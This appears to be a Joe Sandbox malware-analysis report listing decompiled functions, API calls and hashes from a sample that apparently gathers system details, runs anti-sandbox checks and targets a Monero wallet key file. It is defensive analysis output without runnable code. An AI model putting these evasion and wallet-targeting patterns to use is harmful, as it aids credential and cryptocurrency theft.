Instruction ID: abcbfb403e0a8d1b0803ad4c0d1c2c3cbbf3130962cf1a230686410de17121c4
Opcode Fuzzy Hash: 7b1e29486427b69a4ff2e20a4209a56c9afd37853c2542f01da32e92a9ad906b
Instruction Fuzzy Hash: A221E97191021CABDB24DB54DC85FE9B7B8FB58700F00C5D8E609A6240DF71AA86CFE5

Function 008B7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B76A4
RtlAllocateHeap.NTDLL(00000000), ref: 008B76AB
RegOpenKeyExA.KERNEL32(80000002,0126C250,00000000,00020119,00000000), ref: 008B76DD
RegQueryValueExA.KERNEL32(00000000,0127E080,00000000,00000000,?,000000FF), ref: 008B76FE
RegCloseKey.ADVAPI32(00000000), ref: 008B7708

Strings

Windows 11, xrefs: 008B76BD

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 49f7af07d16917a5a946530f5c37dca0f205afa27cd58c79546bbf06c259cffe
Instruction ID: 7f989ded5c41464f380e95074e4045e381b59ff07f7397447e47c5bab92314bd
Opcode Fuzzy Hash: 49f7af07d16917a5a946530f5c37dca0f205afa27cd58c79546bbf06c259cffe
Instruction Fuzzy Hash: 220162B5A04308BFD700DBE4DC89FAEBBB8EB58701F108054FA05DB290DA70A9058B52

Function 008B7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B7734
RtlAllocateHeap.NTDLL(00000000), ref: 008B773B
RegOpenKeyExA.KERNEL32(80000002,0126C250,00000000,00020119,008B76B9), ref: 008B775B
RegQueryValueExA.KERNEL32(008B76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 008B777A
RegCloseKey.ADVAPI32(008B76B9), ref: 008B7784

Strings

CurrentBuildNumber, xrefs: 008B7771

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: 48d7662301350648c9d96c39ffac682af427b92614a297f81ee6c3cc381996ce
Instruction ID: 3ae40b03bedafe3b6bbdd5078fd96edde2748a99a1336ea20c72c76f6dfa8e44
Opcode Fuzzy Hash: 48d7662301350648c9d96c39ffac682af427b92614a297f81ee6c3cc381996ce
Instruction Fuzzy Hash: F00144B5A40308BBEB10DBE4DC89FAEB7B8EB54700F004158FA05EB281DA7065018F52

Function 008B69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 008B9860: GetProcAddress.KERNEL32(74DD0000,01272240), ref: 008B98A1
Part of subcall function 008B9860: GetProcAddress.KERNEL32(74DD0000,012723D8), ref: 008B98BA
Part of subcall function 008B9860: GetProcAddress.KERNEL32(74DD0000,01272300), ref: 008B98D2
Part of subcall function 008B9860: GetProcAddress.KERNEL32(74DD0000,01272258), ref: 008B98EA
Part of subcall function 008B9860: GetProcAddress.KERNEL32(74DD0000,01272270), ref: 008B9903
Part of subcall function 008B9860: GetProcAddress.KERNEL32(74DD0000,01279188), ref: 008B991B
Part of subcall function 008B9860: GetProcAddress.KERNEL32(74DD0000,01265930), ref: 008B9933
Part of subcall function 008B9860: GetProcAddress.KERNEL32(74DD0000,012658D0), ref: 008B994C
Part of subcall function 008B9860: GetProcAddress.KERNEL32(74DD0000,01272420), ref: 008B9964
Part of subcall function 008B9860: GetProcAddress.KERNEL32(74DD0000,01272318), ref: 008B997C
Part of subcall function 008B9860: GetProcAddress.KERNEL32(74DD0000,01272330), ref: 008B9995
Part of subcall function 008B9860: GetProcAddress.KERNEL32(74DD0000,01272348), ref: 008B99AD
Part of subcall function 008B9860: GetProcAddress.KERNEL32(74DD0000,01265BD0), ref: 008B99C5
Part of subcall function 008B9860: GetProcAddress.KERNEL32(74DD0000,01272360), ref: 008B99DE

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008A11D0: ExitProcess.KERNEL32 ref: 008A1211

Part of subcall function 008A1160: GetSystemInfo.KERNEL32(?), ref: 008A116A
Part of subcall function 008A1160: ExitProcess.KERNEL32 ref: 008A117E

Part of subcall function 008A1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 008A112B
Part of subcall function 008A1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 008A1132
Part of subcall function 008A1110: ExitProcess.KERNEL32 ref: 008A1143

Part of subcall function 008A1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 008A123E
Part of subcall function 008A1220: ExitProcess.KERNEL32 ref: 008A1294

Part of subcall function 008B6770: GetUserDefaultLangID.KERNEL32 ref: 008B6774

Part of subcall function 008A1190: ExitProcess.KERNEL32 ref: 008A11C6

Part of subcall function 008B7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008A11B7), ref: 008B7880
Part of subcall function 008B7850: RtlAllocateHeap.NTDLL(00000000), ref: 008B7887
Part of subcall function 008B7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 008B789F

Part of subcall function 008B78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B7910
Part of subcall function 008B78E0: RtlAllocateHeap.NTDLL(00000000), ref: 008B7917
Part of subcall function 008B78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 008B792F

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01279198,?,008C110C,?,00000000,?,008C1110,?,00000000,008C0AEF), ref: 008B6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 008B6AE8
CloseHandle.KERNEL32(00000000), ref: 008B6AF9
Sleep.KERNEL32(00001770), ref: 008B6B04
CloseHandle.KERNEL32(?,00000000,?,01279198,?,008C110C,?,00000000,?,008C1110,?,00000000,008C0AEF), ref: 008B6B1A
ExitProcess.KERNEL32 ref: 008B6B22

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2931873225-0
Opcode ID: db0dd19f2d8482b089ff5cbc31fc7a8ad4bff8215257addc34d704f766ec4db2
Instruction ID: b4526e98b8b4831e9f0274add825dcd3d0dfaa0568ff5491e7c62d80ee6620ce
Opcode Fuzzy Hash: db0dd19f2d8482b089ff5cbc31fc7a8ad4bff8215257addc34d704f766ec4db2
Instruction Fuzzy Hash: 3D310E71900208AAEB08FBE8DC96BEE7778FF54340F504528F112E6691EF746905C7A7

Function 008A99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008A99EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 008A9A11
LocalAlloc.KERNEL32(00000040,?), ref: 008A9A31
ReadFile.KERNEL32(000000FF,?,00000000,008A148F,00000000), ref: 008A9A5A
LocalFree.KERNEL32(008A148F), ref: 008A9A90
CloseHandle.KERNEL32(000000FF), ref: 008A9A9A

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 59cbec864432b68ff56d7420c8dd4d11fdea1a477c176f6665d66a742bc2f005
Instruction ID: 375c1f578cd3df547e22daf46ac5248313b7b277c2cda8625bbe3bc6a3662dd8
Opcode Fuzzy Hash: 59cbec864432b68ff56d7420c8dd4d11fdea1a477c176f6665d66a742bc2f005
Instruction Fuzzy Hash: 1B3129B4A00209EFEF14CF94C885BAE77B5FF49350F108159E916EB690D774AA41CFA1

Function 008B4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0127E218), ref: 008B47DB

Part of subcall function 008B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008B8E0B

lstrcat.KERNEL32(?,00000000), ref: 008B4801
lstrcat.KERNEL32(?,?), ref: 008B4820
lstrcat.KERNEL32(?,?), ref: 008B4834
lstrcat.KERNEL32(?,0126B750), ref: 008B4847
lstrcat.KERNEL32(?,?), ref: 008B485B
lstrcat.KERNEL32(?,0127DC58), ref: 008B486F

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008B8D90: GetFileAttributesA.KERNEL32(00000000,?,008A1B54,?,?,008C564C,?,?,008C0E1F), ref: 008B8D9F

Part of subcall function 008B4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008B4580
Part of subcall function 008B4570: RtlAllocateHeap.NTDLL(00000000), ref: 008B4587
Part of subcall function 008B4570: wsprintfA.USER32 ref: 008B45A6
Part of subcall function 008B4570: FindFirstFileA.KERNEL32(?,?), ref: 008B45BD

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 660b117cec75d2ef85e83135f03b307d87a9d511bd9f05ee71040ce4e9f9c71e
Instruction ID: cfb652fd061d1377cbe46f506c3658943d9728902605a2afde9d4d5af70b1d48
Opcode Fuzzy Hash: 660b117cec75d2ef85e83135f03b307d87a9d511bd9f05ee71040ce4e9f9c71e
Instruction Fuzzy Hash: 0E31AFB2900208A7DB14FBB4DCC6EE9777CFB58700F404589B319D6181EE70A78ACB92

Function 008B40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,0127DB78,00000000,00020119,?), ref: 008B40F4
RegQueryValueExA.ADVAPI32(?,0127E0E0,00000000,00000000,00000000,000000FF), ref: 008B4118
RegCloseKey.ADVAPI32(?), ref: 008B4122
lstrcat.KERNEL32(?,00000000), ref: 008B4147
lstrcat.KERNEL32(?,0127E1B8), ref: 008B415B

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue
String ID:
API String ID: 690832082-0
Opcode ID: a23d4614b6e05c8e46801cea61b8cd1adef4ce06d00728c4e24fa9702d440fa8
Instruction ID: f5ea63e0dad7486d39c86026849ddb923ca2932d3c9c99ee0a6b3946345385c1
Opcode Fuzzy Hash: a23d4614b6e05c8e46801cea61b8cd1adef4ce06d00728c4e24fa9702d440fa8
Instruction Fuzzy Hash: 6541BBB6D001086BDB14EBE4DC86FFE737DF798300F004558B7159A181EA75AB898B93

Function 008B7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B7E37
RtlAllocateHeap.NTDLL(00000000), ref: 008B7E3E
RegOpenKeyExA.KERNEL32(80000002,0126BF40,00000000,00020119,?), ref: 008B7E5E
RegQueryValueExA.KERNEL32(?,0127DA98,00000000,00000000,000000FF,000000FF), ref: 008B7E7F
RegCloseKey.ADVAPI32(?), ref: 008B7E92

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
